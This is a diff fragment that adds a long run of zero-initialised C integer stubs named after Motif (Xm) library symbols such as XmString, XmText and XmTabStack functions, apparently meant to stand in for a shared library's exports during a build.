+int _XmSmnemonic = 0;
+int _XmSmnemonicCharSet = 0;
+int _XmSmodifyVerifyCallback = 0;
+int _XmSmodifyVerifyCallbackWcs = 0;
+int _XmSmotionVerifyCallback = 0;
+int _XmSmoveOpaque = 0;
+int _XmSmultiClick = 0;
+int _XmSmultipleSelectionCallback = 0;
+int _XmSmustMatch = 0;
+int _XmSmwmDecorations = 0;
+int _XmSmwmFunctions = 0;
+int _XmSmwmInputMode = 0;
+int _XmSmwmMenu = 0;
+int _XmSmwmMessages = 0;
+int _XmSnavigationType = 0;
+int _XmSneedsMotion = 0;
+int _XmSnoMatchCallback = 0;
+int _XmSnoMatchString = 0;
+int _XmSnoneCursorForeground = 0;
+int _XmSnoResize = 0;
+int _XmSnotifyProc = 0;
+int _XmSnumColumns = 0;
+int _XmSnumDropRectangles = 0;
+int _XmSnumDropTransfers = 0;
+int _XmSnumExportTargets = 0;
+int _XmSnumImportTargets = 0;
+int _XmSnumRectangles = 0;
+int _XmSocorro = 0;
+int _XmSoffsetX = 0;
+int _XmSoffsetY = 0;
+int _XmSokCallback = 0;
+int _XmSokLabelString = 0;
+int _XmSoperationChangedCallback = 0;
+int _XmSoperationCursorIcon = 0;
+int _XmSoptionLabel = 0;
+int _XmSoptionMnemonic = 0;
+int _XmSortResourceList = 0;
+int _XmSosfActivate = 0;
+int _XmSosfAddMode = 0;
+int _XmSosfBackSpace = 0;
+int _XmSosfBeginLine = 0;
+int _XmSosfCancel = 0;
+int _XmSosfClear = 0;
+int _XmSosfCopy = 0;
+int _XmSosfCut = 0;
+int _XmSosfDelete = 0;
+int _XmSosfDown = 0;
+int _XmSosfEndLine = 0;
+int _XmSosfHelp = 0;
+int _XmSosfInsert = 0;
+int _XmSosfLeft = 0;
+int _XmSosfMenu = 0;
+int _XmSosfMenuBar = 0;
+int _XmSosfPageDown = 0;
+int _XmSosfPageLeft = 0;
+int _XmSosfPageRight = 0;
+int _XmSosfPageUp = 0;
+int _XmSosfPaste = 0;
+int _XmSosfPrimaryPaste = 0;
+int _XmSosfQuickPaste = 0;
+int _XmSosfRight = 0;
+int _XmSosfSelect = 0;
+int _XmSosfUndo = 0;
+int _XmSosfUp = 0;
+int _XmSoutputCreate = 0;
+int _XmSpacking = 0;
+int _XmSpageDecrementCallback = 0;
+int _XmSpageIncrement = 0;
+int _XmSpageIncrementCallback = 0;
+int _XmSpaneMaximum = 0;
+int _XmSpaneMinimum = 0;
+int _XmSpattern = 0;
+int _XmSpendingDelete = 0;
+int _XmSpinB_defaultAccelerators = 0;
+int _XmSpinB_defaultTranslations = 0;
+int xmSpinBoxClassRec = 0;
+int XmSpinBoxValidatePosition = 0;
+int xmSpinBoxWidgetClass = 0;
+int _XmSpopupEnabled = 0;
+int _XmSpositionIndex = 0;
+int _XmSpostFromButton = 0;
+int _XmSpostFromCount = 0;
+int _XmSpostFromList = 0;
+int _XmSpreeditType = 0;
+int _XmSprocessingDirection = 0;
+int _XmSpromptString = 0;
+int _XmSprotocolCallback = 0;
+int _XmSpushButton = 0;
+int _XmSpushButtonEnabled = 0;
+int _XmSqualifySearchDataProc = 0;
+int _XmSradioAlwaysOne = 0;
+int _XmSradioBehavior = 0;
+int _XmSradioButton = 0;
+int _XmSrealizeCallback = 0;
+int _XmSrecomputeSize = 0;
+int _XmSrectangles = 0;
+int _XmSrefigureMode = 0;
+int _XmSrepeatDelay = 0;
+int _XmSresizable = 0;
+int _XmSresizeCallback = 0;
+int _XmSresizeHeight = 0;
+int _XmSresizePolicy = 0;
+int _XmSresizeWidth = 0;
+int _XmSrightAttachment = 0;
+int _XmSrightOffset = 0;
+int _XmSrightPosition = 0;
+int _XmSrightWidget = 0;
+int _XmSrowColumnType = 0;
+int _XmSrows = 0;
+int _XmSrubberPositioning = 0;
+int _XmSsashHeight = 0;
+int _XmSsashIndent = 0;
+int _XmSsashShadowThickness = 0;
+int _XmSsashWidth = 0;
+int _XmSscaleHeight = 0;
+int _XmSscaleMultiple = 0;
+int _XmSscaleWidth = 0;
+int _XmSscrollBarDisplayPolicy = 0;
+int _XmSscrollBarPlacement = 0;
+int _XmSscrolledWindowMarginHeight = 0;
+int _XmSscrolledWindowMarginWidth = 0;
+int _XmSscrollHorizontal = 0;
+int _XmSscrollingPolicy = 0;
+int _XmSscrollLeftSide = 0;
+int _XmSscrollTopSide = 0;
+int _XmSscrollVertical = 0;
+int _XmSselectColor = 0;
+int _XmSselectedItemCount = 0;
+int _XmSselectedItems = 0;
+int _XmSselectInsensitivePixmap = 0;
+int _XmSselectionArrayCount = 0;
+int _XmSselectionLabelString = 0;
+int _XmSselectionPolicy = 0;
+int _XmSselectPixmap = 0;
+int _XmSselectThreshold = 0;
+int _XmSseparator = 0;
+int _XmSseparatorOn = 0;
+int _XmSseparatorType = 0;
+int _XmSset = 0;
+int _XmSshadow = 0;
+int _XmSshadowThickness = 0;
+int _XmSshadowType = 0;
+int _XmSshellUnitType = 0;
+int _XmSshowArrows = 0;
+int _XmSshowAsDefault = 0;
+int _XmSshowSeparator = 0;
+int _XmSshowValue = 0;
+int _XmSsimpleCallback = 0;
+int _XmSsingleSelectionCallback = 0;
+int _XmSsingleSeparator = 0;
+int _XmSsizePolicy = 0;
+int _XmSskipAdjust = 0;
+int _XmSsliderSize = 0;
+int _XmSsource = 0;
+int _XmSsourceCursorIcon = 0;
+int _XmSsourceIsExternal = 0;
+int _XmSsourcePixmapIcon = 0;
+int _XmSsourceWidget = 0;
+int _XmSsourceWindow = 0;
+int _XmSspacing = 0;
+int _XmSstartTime = 0;
+int _XmSstateCursorIcon = 0;
+int _XmSstringDirection = 0;
+int _XmSsubMenuId = 0;
+int _XmSsymbolPixmap = 0;
+int _XmStackFree = 0;
+int _XmStackInit = 0;
+int _XmStackPop = 0;
+int _XmStackPush = 0;
+int xm_std_constraint_filter = 0;
+int xm_std_filter = 0;
+int _XmStearOffMenuActivateCallback = 0;
+int _XmStearOffMenuDeactivateCallback = 0;
+int _XmStearOffModel = 0;
+int _XmStextAccelerators = 0;
+int _XmStextColumns = 0;
+int _XmStextFontList = 0;
+int _XmStextString = 0;
+int _XmStextTranslations = 0;
+int _XmStextValue = 0;
+int _XmStitleString = 0;
+int _XmStoBottomCallback = 0;
+int _XmStopAttachment = 0;
+int _XmStopCharacter = 0;
+int _XmStopItemPosition = 0;
+int _XmStopLevelEnterCallback = 0;
+int _XmStopLevelLeaveCallback = 0;
+int _XmStopOffset = 0;
+int _XmStoPositionCallback = 0;
+int _XmStopPosition = 0;
+int _XmStopShadowColor = 0;
+int _XmStopShadowPixmap = 0;
+int _XmStopWidget = 0;
+int _XmStoTopCallback = 0;
+int _XmStransferProc = 0;
+int _XmStransferStatus = 0;
+int _XmStraversalCallback = 0;
+int _XmStraversalOn = 0;
+int _XmStraversalType = 0;
+int _XmStraverseObscuredCallback = 0;
+int _XmStreeUpdateProc = 0;
+int _XmStringBaseline = 0;
+int XmStringBaseline = 0;
+int _XmStringByteCompare = 0;
+int XmStringByteCompare = 0;
+int XmStringByteStreamLength = 0;
+int _XmStringCacheFree = 0;
+int _XmStringCacheGet = 0;
+int _XmStringCacheTag = 0;
+int _XmStringCharacterCount = 0;
+int XmStringCompare = 0;
+int XmStringComponentCreate = 0;
+int XmStringConcat = 0;
+int XmStringConcatAndFree = 0;
+int _XmStringContextCopy = 0;
+int _XmStringContextFree = 0;
+int _XmStringContextReInit = 0;
+int _XmStringCopy = 0;
+int XmStringCopy = 0;
+int _XmStringCreate = 0;
+int XmStringCreate = 0;
+int _XmStringCreateExternal = 0;
+int XmStringCreateFontList = 0;
+int XmStringCreateFontList_r = 0;
+int XmStringCreateLocalized = 0;
+int XmStringCreateLtoR = 0;
+int XmStringCreateSimple = 0;
+int XmStringDirectionCreate = 0;
+int XmStringDirectionToDirection = 0;
+int _XmStringDraw = 0;
+int XmStringDraw = 0;
+int _XmStringDrawImage = 0;
+int XmStringDrawImage = 0;
+int _XmStringDrawLining = 0;
+int _XmStringDrawMnemonic = 0;
+int _XmStringDrawSegment = 0;
+int _XmStringDrawUnderline = 0;
+int XmStringDrawUnderline = 0;
+int _XmStringEmpty = 0;
+int XmStringEmpty = 0;
+int _XmStringEntryCopy = 0;
+int _XmStringEntryFree = 0;
+int _XmStringExtent = 0;
+int XmStringExtent = 0;
+int _XmStringFree = 0;
+int XmStringFree = 0;
+int _XmStringFreeContext = 0;
+int XmStringFreeContext = 0;
+int XmStringGenerate = 0;
+int _XmStringGetBaselines = 0;
+int _XmStringGetCurrentCharset = 0;
+int XmStringGetLtoR = 0;
+int XmStringGetNextComponent = 0;
+int _XmStringGetNextSegment = 0;
+int XmStringGetNextSegment = 0;
+int _XmStringGetNextTabWidth = 0;
+int XmStringGetNextTriple = 0;
+int _XmStringGetSegment = 0;
+int _XmStringGetTextConcat = 0;
+int _XmStringHasSubstring = 0;
+int XmStringHasSubstring = 0;
+int _XmStringHeight = 0;
+int XmStringHeight = 0;
+int _XmStringIndexCacheTag = 0;
+int _XmStringIndexGetTag = 0;
+int _XmStringInitContext = 0;
+int XmStringInitContext = 0;
+int _XmStringIsCurrentCharset = 0;
+int XmStringIsVoid = 0;
+int _XmStringIsXmString = 0;
+int _XmStringLayout = 0;
+int XmStringLength = 0;
+int _XmStringLineCount = 0;
+int XmStringLineCount = 0;
+int XmStringLtoRCreate = 0;
+int XmStringNConcat = 0;
+int XmStringNCopy = 0;
+int _XmStringNCreate = 0;
+int _XmStringOptToNonOpt = 0;
+int XmStringParseText = 0;
+int XmStringPeekNextComponent = 0;
+int XmStringPeekNextTriple = 0;
+int XmStringPutRendition = 0;
+int _XmStringRender = 0;
+int _XmStrings = 0;
+int _XmStrings22 = 0;
+int _XmStrings23 = 0;
+int _XmStringsAreEqual = 0;
+int XmStringSegmentCreate = 0;
+int _XmStringSegmentExtents = 0;
+int _XmStringSegmentNew = 0;
+int XmStringSeparatorCreate = 0;
+int _XmStringsI = 0;
+int _XmStringSingleSegment = 0;
+int _XmStringSourceCreate = 0;
+int _XmStringSourceDestroy = 0;
+int _XmStringSourceFindString = 0;
+int _XmStringSourceGetEditable = 0;
+int _XmStringSourceGetMaxLength = 0;
+int _XmStringSourceGetPending = 0;
+int _XmStringSourceGetString = 0;
+int _XmStringSourceGetValue = 0;
+int _XmStringSourceHasSelection = 0;
+int _XmStringSourceSetEditable = 0;
+int _XmStringSourceSetGappedBuffer = 0;
+int _XmStringSourceSetMaxLength = 0;
+int _XmStringSourceSetPending = 0;
+int _XmStringSourceSetValue = 0;
+int XmStringTableParseStringArray = 0;
+int XmStringTableProposeTablist = 0;
+int XmStringTableToXmString = 0;
+int XmStringTableUnparse = 0;
+int XmStringToXmStringTable = 0;
+int _XmStringTruncateASN1 = 0;
+int _XmStringUngenerate = 0;
+int XmStringUnparse = 0;
+int _XmStringUpdate = 0;
+int _XmStringUpdateWMShellTitle = 0;
+int _XmStringWidth = 0;
+int XmStringWidth = 0;
+int _XmStroughColor = 0;
+int _XmSunitType = 0;
+int _XmSunmapCallback = 0;
+int _XmSunpostBehavior = 0;
+int _XmSunselectPixmap = 0;
+int _XmSupdateSliderSize = 0;
+int _XmSuseAsyncGeometry = 0;
+int _XmSuserData = 0;
+int _XmSvalidCursorForeground = 0;
+int _XmSvalueChangedCallback = 0;
+int _XmSvalueWcs = 0;
+int _XmSverifyBell = 0;
+int _XmSverticalFontUnit = 0;
+int _XmSverticalScrollBar = 0;
+int _XmSverticalSpacing = 0;
+int _XmSvisibleItemCount = 0;
+int _XmSvisibleWhenOff = 0;
+int _XmSvisualPolicy = 0;
+int _XmSWGetClipArea = 0;
+int _XmSwhichButton = 0;
+int _XmSWNotifyGeoChange = 0;
+int _XmSwordWrap = 0;
+int _XmSworkWindow = 0;
+int _XmSyncDropSiteTree = 0;
+int XmTabAttributesFree = 0;
+int XmTabbedStackListAppend = 0;
+int _XmTabbedStackListArray = 0;
+int XmTabbedStackListCompare = 0;
+int XmTabbedStackListCopy = 0;
+int _XmTabbedStackListCount = 0;
+int XmTabbedStackListCreate = 0;
+int XmTabbedStackListFind = 0;
+int XmTabbedStackListFree = 0;
+int _XmTabbedStackListGet = 0;
+int XmTabbedStackListInsert = 0;
+int XmTabbedStackListModify = 0;
+int XmTabbedStackListQuery = 0;
+int XmTabbedStackListRemove = 0;
+int XmTabbedStackListSimpleAppend = 0;
+int XmTabbedStackListSimpleInsert = 0;
+int XmTabbedStackListSimpleModify = 0;
+int XmTabbedStackListSimpleQuery = 0;
+int XmTabbedStackListSimpleRemove = 0;
+int _XmTabBoxCanvas = 0;
+int xmTabBoxClassRec = 0;
+int XmTabBoxGetIndex = 0;
+int _XmTabBoxGetMaxTabHeight = 0;
+int _XmTabBoxGetMaxTabWidth = 0;
+int XmTabBoxGetNumColumns = 0;
+int XmTabBoxGetNumRows = 0;
+int _XmTabBoxGetNumRowsColumns = 0;
+int XmTabBoxGetNumTabs = 0;
+int _XmTabBoxGetTabHeight = 0;
+int XmTabBoxGetTabRow = 0;
+int _XmTabBoxGetTabWidth = 0;
+int _XmTabBoxSelectTab = 0;
+int _XmTabBoxStackedGeometry = 0;
+int xmTabBoxWidgetClass = 0;
+int XmTabBoxXYToIndex = 0;
+int xmTabCanvasClassRec = 0;
+int xmTabCanvasWidgetClass = 0;
+int _XmTabCopy = 0;
+int XmTabCreate = 0;
+int XmTabFree = 0;
+int XmTabGetValues = 0;
+int _XmTabListAdd = 0;
+int XmTabListCopy = 0;
+int _XmTabListDelete = 0;
+int XmTabListFree = 0;
+int _XmTabListGetPosition = 0;
+int XmTabListGetTab = 0;
+int XmTabListInsertTabs = 0;
+int XmTabListRemoveTabs = 0;
+int XmTabListReplacePositions = 0;
+int XmTabListTabCount = 0;
+int XmTabSetValue = 0;
+int xmTabStackClassRec = 0;
+int XmTabStackGetSelectedTab = 0;
+int XmTabStackIndexToWidget = 0;
+int XmTabStackSelectTab = 0;
+int xmTabStackWidgetClass = 0;
+int XmTargetsAreCompatible = 0;
+int _XmTargetsToIndex = 0;
+int _XmTearOffB_overrideTranslations = 0;
+int _XmTearOffBPrimClassExtRec = 0;
+int _XmTearOffBtnDownEventHandler = 0;
+int _XmTearOffBtnUpEventHandler = 0;
+int xmTearOffButtonClassRec = 0;
+int xmTearOffButtonWidgetClass = 0;
+int _XmTearOffInitiate = 0;
+int _XmTestTraversability = 0;
+int _XmTextAdjustGC = 0;
+int _XmTextBytesToCharacters = 0;
+int _XmTextChangeBlinkBehavior = 0;
+int _XmTextChangeHOffset = 0;
+int _XmTextChangeVOffset = 0;
+int _XmTextCharactersToBytes = 0;
+int xmTextClassRec = 0;
+int _XmTextClearDestination = 0;
+int XmTextClearSelection = 0;
+int _XmTextConvert = 0;
+int XmTextCopy = 0;
+int XmTextCopyLink = 0;
+int _XmTextCountCharacters = 0;
+int XmTextCut = 0;
+int _XmTextDestinationVisible = 0;
+int _XmTextDisableRedisplay = 0;
+int XmTextDisableRedisplay = 0;
+int _XmTextDrawDestination = 0;
+int _XmTextEnableRedisplay = 0;
+int XmTextEnableRedisplay = 0;
+int _XmTextEventBindings1 = 0;
+int _XmTextEventBindings2 = 0;
+int _XmTextEventBindings3 = 0;
+int _XmTextF_EventBindings1 = 0;
+int _XmTextF_EventBindings2 = 0;
+int _XmTextF_EventBindings3 = 0;
+int xmTextFieldClassRec = 0;
+int XmTextFieldClearSelection = 0;
+int _XmTextFieldConvert = 0;
+int XmTextFieldCopy = 0;
+int XmTextFieldCopyLink = 0;
+int _XmTextFieldCountBytes = 0;
+int _XmTextFieldCountCharacters = 0;
+int XmTextFieldCut = 0;
+int _XmTextFieldDeselectSelection = 0;
+int _XmTextFieldDestinationVisible = 0;
+int _XmTextFieldDrawInsertionPoint = 0;
+int XmTextFieldGetAddMode = 0;
+int XmTextFieldGetBaseline = 0;
+int XmTextFieldGetBaseLine = 0;
+int XmTextFieldGetCursorPosition = 0;
+int _XmTextFieldGetDropReciever = 0;
+int XmTextFieldGetEditable = 0;
+int XmTextFieldGetInsertionPosition = 0;
+int XmTextFieldGetLastPosition = 0;
+int XmTextFieldGetMaxLength = 0;
+int XmTextFieldGetSelection = 0;
+int XmTextFieldGetSelectionPosition = 0;
+int XmTextFieldGetSelectionWcs = 0;
+int XmTextFieldGetString = 0;
+int XmTextFieldGetStringWcs = 0;
+int XmTextFieldGetSubstring = 0;
+int XmTextFieldGetSubstringWcs = 0;
+int _XmTextFieldHandleSecondaryFinished = 0;
+int XmTextFieldInsert = 0;
+int XmTextFieldInsertWcs = 0;
+int _XmTextFieldInstallTransferTrait = 0;
+int _XmTextFieldLoseSelection = 0;
+int XmTextFieldPaste = 0;
+int XmTextFieldPasteLink = 0;
+int XmTextFieldPosToXY = 0;
+int XmTextFieldRemove = 0;
+int XmTextFieldReplace = 0;
+int _XmTextFieldReplaceText = 0;
+int XmTextFieldReplaceWcs = 0;
+int XmTextFieldSetAddMode = 0;
+int _XmTextFieldSetClipRect = 0;
+int _XmTextFieldSetCursorPosition = 0;
+int XmTextFieldSetCursorPosition = 0;
+int _XmTextFieldSetDestination = 0;
+int XmTextFieldSetEditable = 0;
+int XmTextFieldSetHighlight = 0;
+int XmTextFieldSetInsertionPosition = 0;
+int XmTextFieldSetMaxLength = 0;
+int _XmTextFieldSetSel2 = 0;
+int XmTextFieldSetSelection = 0;
+int XmTextFieldSetString = 0;
+int XmTextFieldSetStringWcs = 0;
+int XmTextFieldShowPosition = 0;
+int _XmTextFieldStartSelection = 0;
+int xmTextFieldWidgetClass = 0;
+int XmTextFieldXYToPos = 0;
+int _XmTextFindLineEnd = 0;
+int _XmTextFindScroll = 0;
+int XmTextFindString = 0;
+int _XmTextFindStringBackwards = 0;
+int _XmTextFindStringForwards = 0;
+int XmTextFindStringWcs = 0;
+int _XmTextFPrimClassExtRec = 0;
+int _XmTextFreeContextData = 0;
+int _XmTextFToggleCursorGC = 0;
+int XmTextGetAddMode = 0;
+int _XmTextGetAnchor = 0;
+int XmTextGetBaseline = 0;
+int _XmTextGetBaseLine = 0;
+int XmTextGetBaseLine = 0;
+int _XmTextGetBaselines = 0;
+int XmTextGetCenterline = 0;
+int XmTextGetCursorPosition = 0;
+int _XmTextGetDisplayRect = 0;
+int _XmTextGetDropReciever = 0;
+int XmTextGetEditable = 0;
+int XmTextGetInsertionPosition = 0;
+int XmTextGetLastPosition = 0;
+int _XmTextGetLineTable = 0;
+int XmTextGetMaxLength = 0;
+int _XmTextGetNumberLines = 0;
+int _XmTextGetSel2 = 0;
+int XmTextGetSelection = 0;
+int XmTextGetSelectionPosition = 0;
+int XmTextGetSelectionWcs = 0;
+int XmTextGetSource = 0;
+int XmTextGetString = 0;
+int XmTextGetStringWcs = 0;
+int XmTextGetSubstring = 0;
+int XmTextGetSubstringWcs = 0;
+int _XmTextGetTableIndex = 0;
+int XmTextGetTopCharacter = 0;
+int _XmTextGetTotalLines = 0;
+int _XmTextHandleSecondaryFinished = 0;
+int _XmTextHasDestination = 0;
+int _XmTextInputCreate = 0;
+int _XmTextInputGetSecResData = 0;
+int XmTextInsert = 0;
+int XmTextInsertWcs = 0;
+int _XmTextInstallTransferTrait = 0;
+int _XmTextInvalidate = 0;
+int _XmTextIn_XmTextEventBindings1 = 0;
+int _XmTextIn_XmTextEventBindings2 = 0;
+int _XmTextIn_XmTextEventBindings3 = 0;
+int _XmTextIn_XmTextVEventBindings = 0;
+int _XmTextLineInfo = 0;
+int _XmTextLoseSelection = 0;
+int _XmTextMarginsProc = 0;
+int _XmTextMarkRedraw = 0;
+int _XmTextModifyVerify = 0;
+int _XmTextMovingCursorPosition = 0;
+int _XmTextNeedsPendingDeleteDis = 0;
+int _XmTextNumLines = 0;
+int _XmTextOutLoadGCsAndRecolorCursors = 0;
+int _XmTextOutputCreate = 0;
+int _XmTextOutputGetSecResData = 0;
+int XmTextPaste = 0;
+int XmTextPasteLink = 0;
+int _XmTextPosToLine = 0;
+int XmTextPosToXY = 0;
+int _XmTextPrimClassExtRec = 0;
+int _XmTextRealignLineTable = 0;
+int XmTextRemove = 0;
+int _XmTextReplace = 0;
+int XmTextReplace = 0;
+int XmTextReplaceWcs = 0;
+int _XmTextResetClipOrigin = 0;
+int _XmTextResetIC = 0;
+int XmTextScroll = 0;
+int _XmTextScrollable = 0;
+int XmTextSetAddMode = 0;
+int _XmTextSetCursorPosition = 0;
+int XmTextSetCursorPosition = 0;
+int _XmTextSetDestinationSelection = 0;
+int _XmTextSetEditable = 0;
+int XmTextSetEditable = 0;
+int _XmTextSetHighlight = 0;
+int XmTextSetHighlight = 0;
+int XmTextSetInsertionPosition = 0;
+int XmTextSetMaxLength = 0;
+int _XmTextSetPreeditPosition = 0;
+int _XmTextSetSel2 = 0;
+int XmTextSetSelection = 0;
+int XmTextSetSource = 0;
+int XmTextSetString = 0;
+int XmTextSetStringWcs = 0;
+int _XmTextSetTopCharacter = 0;
+int XmTextSetTopCharacter = 0;
+int _XmTextShouldWordWrap = 0;
+int _XmTextShowPosition = 0;
+int XmTextShowPosition = 0;
+int _XmTextToggleCursorGC = 0;
+int _XmTextToLocaleText = 0;
+int _XmTextUpdateLineTable = 0;
+int _XmTextValidate = 0;
+int _XmTextValueChanged = 0;
+int xmTextWidgetClass = 0;
+int XmTextXYToPos = 0;
+int _XmToggleBCacheCompare = 0;
+int _XmToggleB_defaultTranslations = 0;
+int _XmToggleBGadClassExtRec = 0;
+int _XmToggleB_menuTranslations = 0;
+int _XmToggleBPrimClassExtRec = 0;
+int xmToggleButtonClassRec = 0;
+int xmToggleButtonGadgetClass = 0;
+int xmToggleButtonGadgetClassRec = 0;
+int XmToggleButtonGadgetGetState = 0;
+int XmToggleButtonGadgetSetState = 0;
+int XmToggleButtonGadgetSetValue = 0;
+int xmToggleButtonGCacheObjClassRec = 0;
+int XmToggleButtonGetState = 0;
+int XmToggleButtonSetState = 0;
+int XmToggleButtonSetValue = 0;
+int xmToggleButtonWidgetClass = 0;
+int _XmToHorizontalPixels = 0;
+int _XmToLayoutDirection = 0;
+int _XmToolTipEnter = 0;
+int XmToolTipGetLabel = 0;
+int _XmToolTipLeave = 0;
+int _XmToolTipRemove = 0;
+int _XmToPanedPixels = 0;
+int _XmTopShadowColorDefault = 0;
+int _XmTopShadowPixmapDefault = 0;
+int _XmToVerticalPixels = 0;
+int XmTrackingEvent = 0;
+int XmTrackingLocate = 0;
+int _XmTrackShellFocus = 0;
+int XmTransferDone = 0;
+int _XmTransferGetDestinationCBStruct = 0;
+int XmTransferSendRequest = 0;
+int XmTransferSetParameters = 0;
+int XmTransferStartRequest = 0;
+int XmTransferValue = 0;
+int _XmTransformSubResources = 0;
+int XmTranslateKey = 0;
+int _XmTraverse = 0;
+int _XmTraverseAway = 0;
+int _XmTraverseDown = 0;
+int _XmTraverseHome = 0;
+int _XmTraverseLeft = 0;
+int _XmTraverseNext = 0;
+int _XmTraverseNextTabGroup = 0;
+int _XmTraversePrev = 0;
+int _XmTraversePrevTabGroup = 0;
+int _XmTraverseRight = 0;
+int _XmTraverseUp = 0;
+int _XmTravGraphAdd = 0;
+int _XmTravGraphRemove = 0;
+int _XmTravGraphUpdate = 0;
+int xmTreeClassRec = 0;
+int xmTreeWidgetClass = 0;
+int XmuNCopyISOLatin1Lowered = 0;
+int _XmUnhighlightBorder = 0;
+int XmUninstallImage = 0;
+int _XmUnitTypeDefault = 0;
+int XmUpdateDisplay = 0;
+int _XmUseColorObj = 0;
+int xmUseVersion = 0;
+int _XmUtf8ToUcs2 = 0;
+int _XmUtilIsSubclassByNameQ = 0;
+int XmVaCreateArrowButton = 0;
+int XmVaCreateArrowButtonGadget = 0;
+int XmVaCreateBulletinBoard = 0;
+int XmVaCreateButtonBox = 0;
+int XmVaCreateCascadeButton = 0;
+int XmVaCreateCascadeButtonGadget = 0;
+int XmVaCreateColorSelector = 0;
+int XmVaCreateColumn = 0;
+int XmVaCreateCombinationBox2 = 0;
+int XmVaCreateComboBox = 0;
+int XmVaCreateCommand = 0;
+int XmVaCreateContainer = 0;
+int XmVaCreateDataField = 0;
+int XmVaCreateDrawingArea = 0;
+int XmVaCreateDrawnButton = 0;
+int XmVaCreateDropDown = 0;
+int XmVaCreateExt18List = 0;
+int XmVaCreateFileSelectionBox = 0;
+int XmVaCreateForm = 0;
+int XmVaCreateFrame = 0;
+int XmVaCreateIconGadget = 0;
+int XmVaCreateLabel = 0;
+int XmVaCreateLabelGadget = 0;
+int XmVaCreateList = 0;
+int XmVaCreateMainWindow = 0;
+int XmVaCreateManagedArrowButton = 0;
+int XmVaCreateManagedArrowButtonGadget = 0;
+int XmVaCreateManagedBulletinBoard = 0;
+int XmVaCreateManagedButtonBox = 0;
+int XmVaCreateManagedCascadeButton = 0;
+int XmVaCreateManagedCascadeButtonGadget = 0;
+int XmVaCreateManagedColorSelector = 0;
+int XmVaCreateManagedColumn = 0;
+int XmVaCreateManagedCombinationBox2 = 0;
+int XmVaCreateManagedComboBox = 0;
+int XmVaCreateManagedCommand = 0;
+int XmVaCreateManagedContainer = 0;
+int XmVaCreateManagedDataField = 0;
+int XmVaCreateManagedDrawingArea = 0;
+int XmVaCreateManagedDrawnButton = 0;
+int XmVaCreateManagedDropDown = 0;
+int XmVaCreateManagedExt18List = 0;
+int XmVaCreateManagedFileSelectionBox = 0;
+int XmVaCreateManagedForm = 0;
+int XmVaCreateManagedFrame = 0;
+int XmVaCreateManagedIconGadget = 0;
+int XmVaCreateManagedLabel = 0;
+int XmVaCreateManagedLabelGadget = 0;
+int XmVaCreateManagedList = 0;
+int XmVaCreateManagedMainWindow = 0;
+int XmVaCreateManagedMessageBox = 0;
+int XmVaCreateManagedMultiList = 0;
+int XmVaCreateManagedNotebook = 0;
+int XmVaCreateManagedPanedWindow = 0;
+int XmVaCreateManagedPushButton = 0;
+int XmVaCreateManagedPushButtonGadget = 0;
+int XmVaCreateManagedRowColumn = 0;
+int XmVaCreateManagedScale = 0;
+int XmVaCreateManagedScrollBar = 0;
+int XmVaCreateManagedScrolledWindow = 0;
+int XmVaCreateManagedSelectionBox = 0;
+int XmVaCreateManagedSeparator = 0;
+int XmVaCreateManagedSeparatorGadget = 0;
+int XmVaCreateManagedSimpleSpinBox = 0;
+int XmVaCreateManagedSpinBox = 0;
+int XmVaCreateManagedTabStack = 0;
+int XmVaCreateManagedText = 0;
+int XmVaCreateManagedTextField = 0;
+int XmVaCreateManagedToggleButton = 0;
+int XmVaCreateManagedToggleButtonGadget = 0;
+int XmVaCreateMessageBox = 0;
+int XmVaCreateMultiList = 0;
+int XmVaCreateNotebook = 0;
+int XmVaCreatePanedWindow = 0;
+int XmVaCreatePushButton = 0;
+int XmVaCreatePushButtonGadget = 0;
+int XmVaCreateRowColumn = 0;
+int XmVaCreateScale = 0;
+int XmVaCreateScrollBar = 0;
+int XmVaCreateScrolledWindow = 0;
+int XmVaCreateSelectionBox = 0;
+int XmVaCreateSeparator = 0;
+int XmVaCreateSeparatorGadget = 0;
+int XmVaCreateSimpleCheckBox = 0;
+int XmVaCreateSimpleMenuBar = 0;
+int XmVaCreateSimpleOptionMenu = 0;
+int XmVaCreateSimplePopupMenu = 0;
+int XmVaCreateSimplePulldownMenu = 0;
+int XmVaCreateSimpleRadioBox = 0;
+int XmVaCreateSimpleSpinBox = 0;
+int XmVaCreateSpinBox = 0;
+int XmVaCreateTabStack = 0;
+int XmVaCreateText = 0;
+int XmVaCreateTextField = 0;
+int XmVaCreateToggleButton = 0;
+int XmVaCreateToggleButtonGadget = 0;
+int _XmValidateFocus = 0;
+int _XmValidCursorIconQuark = 0;
+int _XmValidTimestamp = 0;
+int _XmVaToTypedArgList = 0;
+int _XmVendorExtRealize = 0;
+int xmVendorShellExtClassRec = 0;
+int xmVendorShellExtObjectClass = 0;
+int _XmVersionString = 0;
+int _XmVirtKeys_acornFallbackBindingString = 0;
+int _XmVirtKeys_apolloFallbackBindingString = 0;
+int _XmVirtKeys_dblclkFallbackBindingString = 0;
+int _XmVirtKeys_decFallbackBindingString = 0;
+int _XmVirtKeysDestroy = 0;
+int _XmVirtKeys_dgFallbackBindingString = 0;
+int _XmVirtKeys_fallbackBindingString = 0;
+int _XmVirtKeysHandler = 0;
+int _XmVirtKeys_hpFallbackBindingString = 0;
+int _XmVirtKeys_ibmFallbackBindingString = 0;
+int _XmVirtKeys_ingrFallbackBindingString = 0;
+int _XmVirtKeysInitialize = 0;
+int _XmVirtKeysLoadFallbackBindings = 0;
+int _XmVirtKeysLoadFileBindings = 0;
+int _XmVirtKeys_megatekFallbackBindingString = 0;
+int _XmVirtKeys_motorolaFallbackBindingString = 0;
+int _XmVirtKeys_sgiFallbackBindingString = 0;
+int _XmVirtKeys_siemens9733FallbackBindingString = 0;
+int _XmVirtKeys_siemensWx200FallbackBindingString = 0;
+int _XmVirtKeys_sunFallbackBindingString = 0;
+int _XmVirtKeys_tekFallbackBindingString = 0;
+int _XmVirtualToActualKeysym = 0;
+int _XmWarning = 0;
+int _XmWarningMsg = 0;
+int _XmWhitePixel = 0;
+int _XmWidgetFocusChange = 0;
+int XmWidgetGetBaselines = 0;
+int XmWidgetGetDisplayRect = 0;
+int _XmWidgetIsTraversable = 0;
+int xmWorldClass = 0;
+int xmWorldClassRec = 0;
+int xmWorldObjectClass = 0;
+int _XmWriteDragBuffer = 0;
+int _XmWriteDSToStream = 0;
+int _XmWriteInitiatorInfo = 0;
+int _XmXftDrawCreate = 0;
+int _XmXftDrawDestroy = 0;
+int _XmXftDrawString = 0;
+int _XmXftDrawString2 = 0;
+int _XmXftFontAverageWidth = 0;
+int _XmXftGetXftColor = 0;
+int _XmXftSetClipRectangles = 0;
+int _Xmxpmatoui = 0;
+int _XmxpmColorKeys = 0;
